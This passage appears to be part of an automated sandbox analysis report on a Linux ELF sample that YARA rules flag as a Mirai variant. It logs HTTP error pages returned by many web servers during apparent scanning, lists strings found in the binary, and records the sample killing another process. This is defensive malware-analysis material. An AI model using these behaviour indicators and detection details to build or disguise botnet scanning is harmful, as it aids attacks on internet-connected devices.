20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Tue, 02 Jan 2024 00:25:24 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 75 74 69 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 6f 6e 4c 6f 61 64 3d 27 6c 6f 67 6f 75 74 32 28 29 27 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE><script language="javascript" src="util.js"></script></HEAD><BODY onLoad='logout2()' BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 02 Jan 2024 05:25:29 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Tue, 02 Jan 2024 05:25:34 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Tue, 02 Jan 2024 05:25:35 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jan 2024 05:25:35 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jan 2024 05:25:38 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jan 2024 05:24:52 GMTServer: Apache/2.2.9 (Debian) DAV/2 mod_ssl/2.2.9 OpenSSL/0.9.8gLast-Modified: Tue, 14 Mar 2017 11:18:34 GMTETag: "3ca039-30b-54aaefd0ff680;48211bc79dac0"Accept-Ranges: bytesContent-Length: 779Vary: Accept-EncodingKeep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 69 73 70 43 50 20 4f 4d 45 47 41 20 2d 20 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 65 72 72 6f 72 64 6f 63 73 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 65 72 72 6f 72 64 6f 63 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 7a 68 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 68 32 3e 45 72 72 6f 72 20 34 30 34 21 3c 2f 68 32 3e 0a 09 09 09 09 3c 62 72 20 2f 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 70 61 74 68 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 67 65 74 5f 70 61 74 68 28 29 29 3b 20 3c 2f 73 63 72 69 70 74 3e 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 3c 68 33 3e 5a 65 66 69 78 2e 2e 2e 21 20 4e 69 78 20 67 66 75 6e 64 6e 21 3c 2f 68 33 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>ispCP OMEGA - Error 404</title><meta name="robots" conten
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Tue, 02 Jan 2024 05:25:38 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Tue, 02 Jan 2024 05:25:38 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.2Date: Tue, 02 Jan 2024 05:25:37 GMTContent-Type: text/htmlContent-Length: 3650Connection: keep-aliveETag: "59bf8f7f-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jan 2024 05:25:47 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 02 Jan 2024 05:25:42 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jan 2024 05:25:44 GMTServer: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.5.30Vary: accept-language,accept-charsetAccept-Ranges: bytesConnection: closeContent-Type: text/html; charset=utf-8Content-Language: enExpires: Tue, 02 Jan 2024 05:25:44 GMTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 70 6f 73 74 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:postmaster@localhost" /><style type="text/css"><!--/*--><![CDATA[/*><!--*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/*]]>*/--></style></head><body><h1>Object not found!
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jan 2024 05:25:42 GMTServer: ApacheContent-Length: 65Keep-Alive: timeout=3, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e Data Ascii: <h1>Not Found</h1>The requested URL was not found on this server.
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: TengineDate: Tue, 02 Jan 2024 05:25:44 GMTContent-Type: text/htmlContent-Length: 221Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr/>Powered by Tengine<hr><center>nginx</center></body></html>
              Source: if33NMq1O2.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: if33NMq1O2.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

              System Summary

              barindex
              Source: if33NMq1O2.elf, type: SAMPLEMatched rule: Detects ELF Mirai variant Author: Florian Roth
              Source: if33NMq1O2.elf, type: SAMPLEMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 6213.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
              Source: 6213.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 6209.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
              Source: 6209.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 6258.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
              Source: 6258.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 2018, result: successfulJump to behavior
